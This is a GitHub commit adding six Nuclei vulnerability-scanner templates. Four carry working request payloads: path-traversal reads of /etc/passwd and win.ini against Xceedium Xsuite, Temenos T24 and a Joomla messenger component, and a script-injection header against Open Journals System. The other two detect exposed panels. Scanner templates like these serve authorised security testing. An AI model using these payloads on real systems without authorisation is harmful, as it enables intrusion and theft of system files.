Skip to content

Commit

Permalink
update nuclei-templates 2022-07-12 10:04:1657591449
Browse files Browse the repository at this point in the history
  • Loading branch information
x51pwn committed Jul 12, 2022
1 parent 3f6e4d1 commit d8eb088
Show file tree
Hide file tree
Showing 6 changed files with 205 additions and 0 deletions.
33 changes: 33 additions & 0 deletions config/nuclei-templates/cves/2015/CVE-2015-4666.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2015-4666
info:
name: Xceedium Xsuite 2.4.4.5 - Directory Traversal
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter.
reference:
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
- https://www.cvedetails.com/cve/CVE-2015-4666
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
- http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-4666
cwe-id: CWE-22
tags: cve,cve2015,xceedium,xsuite,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
36 changes: 36 additions & 0 deletions config/nuclei-templates/cves/2019/CVE-2019-14251.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: CVE-2019-14251

info:
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal
author: 0x_Akoko
severity: high
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server.
reference:
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
- https://www.cvedetails.com/cve/CVE-2019-14251
- https://vuldb.com/?id.146815
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-14251
cwe-id: CWE-22
tags: cve,cve2019,temenos,lfi,unauth

requests:
- method: GET
path:
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd"
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or

- type: status
status:
- 200
32 changes: 32 additions & 0 deletions config/nuclei-templates/cves/2019/CVE-2019-9922.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2019-9922
info:
name: JE Messenger 1.2.2 Joomla - Directory Traversal
author: 0x_Akoko
severity: high
description: An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla. Directory Traversal allows read access to arbitrary files.
reference:
- https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
- https://www.cvedetails.com/cve/CVE-2019-9922
- https://extensions.joomla.org/extension/je-messenger/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9922
cwe-id: CWE-22
tags: cve,cve2019,joomla,messenger,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
44 changes: 44 additions & 0 deletions config/nuclei-templates/cves/2022/CVE-2022-24181.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: CVE-2022-24181

info:
name: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
author: lucasljm2001,ekrause
severity: medium
description: |
Detects an XSS vulnerability in Open Journals System.
reference:
- https://www.exploit-db.com/exploits/50881
- https://github.com/pkp/pkp-lib/issues/7649
- https://youtu.be/v8-9evO2oVg
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-24181
- https://nvd.nist.gov/vuln/detail/cve-2022-24181
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24181
metadata:
verified: true
tags: cve,cve2022,xss,oss,pkp-lib

requests:
- raw:
- |
GET /iupjournals/index.php/esj HTTP/2
Host: {{Hostname}}
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script><x=".com/iupjournals'

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
34 changes: 34 additions & 0 deletions config/nuclei-templates/exposed-panels/icewarp-panel-detect.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
id: icewarp-panel-detect

info:
name: IceWarp Panel Detect
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: title:"icewarp"
tags: icewarp,panel

requests:
- method: GET
path:
- "{{BaseURL}}/webmail/"

matchers-condition: and
matchers:

- type: word
part: header
words:
- 'IceWarp'

- type: status
status:
- 200

extractors:
- type: regex
part: header
group: 1
regex:
- 'Server: (.{4,20})'
26 changes: 26 additions & 0 deletions config/nuclei-templates/technologies/samsung-smarttv-debug.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
id: samsung-smarttv-debug
info:
name: Samsung SmartTV Debug Config
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: title:"Debug Config"
tags: samsung,tech,iot

requests:
- method: GET
path:
- '{{BaseURL}}'

matchers-condition: and
matchers:
- type: word
words:
- '<title>Debug Config</title>'
- 'MultiScreen Service'
condition: and

- type: status
status:
- 200

0 comments on commit d8eb088

Please sign in to comment.